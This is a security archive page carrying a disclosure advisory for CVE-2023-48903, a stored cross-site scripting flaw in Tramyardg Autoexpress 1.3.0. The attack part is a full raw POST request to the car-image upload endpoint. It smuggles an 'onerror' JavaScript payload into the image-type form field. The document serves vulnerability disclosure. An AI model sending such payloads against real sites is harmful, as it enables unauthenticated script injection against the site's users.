Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Tramyardg Autoexpress 1.3.0 Cross Site Scripting[6]
- Authored by Scott White[7]
-
Tramyardg Autoexpress version 1.3.0 suffers from a persistent cross site scripting vulnerability.
- advisories | CVE-2023-48903[8]
- SHA-256 |
e5d38e6f27165a96b83eb9ff1357086d82ad45bbc6a91a8b4f1d9aa5f2e996a5
- Download[9] | Favorite[10] | View[11]
Change Mirror[12] Download[13]
# Exploit Title: tramyardg autoexpress - Stored Cross-Site Scripting (XSS)
# Google Dork: N/A
# Date: 11/28/2023
# Exploit Author: Scott White
# Vendor Homepage: https://github.com/tramyardg/autoexpress
# Version: v1.3.0
# Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52
# CVE : CVE-2023-48903
# References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48903
https://www.cve.org/CVERecord?id=CVE-2023-48903
# Description:
Autoexpress 1.3.0 is affected by a stored cross-site scripting (XSS) feature that allows for an unauthenticated attacker to execute JavaScript commands.
# Proof of Concept:
+ Go to "http://localhost/autoexpress"
+ Craft POST request to /autoexpress/admin/api/uploadCarImages.php within BurpSuite (Repeater)
+ The form-data name "imageType[]" is vulnerable
# Sample Request
POST /autoexpress/admin/api/uploadCarImages.php HTTP/1.1
Host: localhost
Content-Length: 17016
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9juDWgTa5YsjE2YR
Origin: http://localhost
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="files[]"; filename="image.jpeg"
Content-Type: image/jpeg
IMAGE_CONTENT
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="id"
CAR_ID
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="fd[]"
IMAGE_CONTENT_BASE64_ENCODED
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="imgType[]"
data:image/jpeg;base64"onerror=alert(1002)<!--------WebKitFormBoundary9juDWgTa5YsjE2YR--
File Tags
- ActiveX[19] (933)
- Advisory[20] (84,514)
- Arbitrary[21] (16,605)
- BBS[22] (2,859)
- Bypass[23] (1,826)
- CGI[24] (1,032)
- Code Execution[25] (7,608)
- Conference[26] (687)
- Cracker[27] (844)
- CSRF[28] (3,370)
- DoS[29] (24,433)
- Encryption[30] (2,383)
- Exploit[31] (52,684)
- File Inclusion[32] (4,248)
- File Upload[33] (983)
- Firewall[34] (822)
- Info Disclosure[35] (2,835)
- Intrusion Detection[36] (905)
- Java[37] (3,118)
- JavaScript[38] (888)
- Kernel[39] (6,968)
- Local[40] (14,675)
- Magazine[41] (586)
- Overflow[42] (13,006)
- Perl[43] (1,430)
- PHP[44] (5,180)
- Proof of Concept[45] (2,365)
- Protocol[46] (3,690)
- Python[47] (1,596)
- Remote[48] (31,340)
- Root[49] (3,616)
- Rootkit[50] (520)
- Ruby[51] (617)
- Scanner[52] (1,649)
- Security Tool[53] (7,969)
- Shell[54] (3,241)
- Shellcode[55] (1,217)
- Sniffer[56] (899)
- Spoof[57] (2,256)
- SQL Injection[58] (16,502)
- TCP[59] (2,422)
- Trojan[60] (688)
- UDP[61] (897)
- Virus[62] (668)
- Vulnerability[63] (32,507)
- Web[64] (9,851)
- Whitepaper[65] (3,770)
- x86[66] (967)
- XSS[67] (18,143)
- Other[68]
File Archives
- March 2024[69]
- February 2024[70]
- January 2024[71]
- December 2023[72]
- November 2023[73]
- October 2023[74]
- September 2023[75]
- August 2023[76]
- July 2023[77]
- June 2023[78]
- May 2023[79]
- April 2023[80]
- Older[81]
Systems
- AIX[82] (429)
- Apple[83] (2,070)
- BSD[84] (376)
- CentOS[85] (57)
- Cisco[86] (1,927)
- Debian[87] (6,984)
- Fedora[88] (1,693)
- FreeBSD[89] (1,246)
- Gentoo[90] (4,466)
- HPUX[91] (880)
- iOS[92] (371)
- iPhone[93] (108)
- IRIX[94] (220)
- Juniper[95] (69)
- Linux[96] (48,919)
- Mac OS X[97] (691)
- Mandriva[98] (3,105)
- NetBSD[99] (256)
- OpenBSD[100] (488)
- RedHat[101] (15,291)
- Slackware[102] (941)
- Solaris[103] (1,611)
- SUSE[104] (1,444)
- Ubuntu[105] (9,373)
- UNIX[106] (9,378)
- UnixWare[107] (187)
- Windows[108] (6,641)
- Other[109]
- Services
- Security Services[120]
- Hosting By
- Rokasec[121]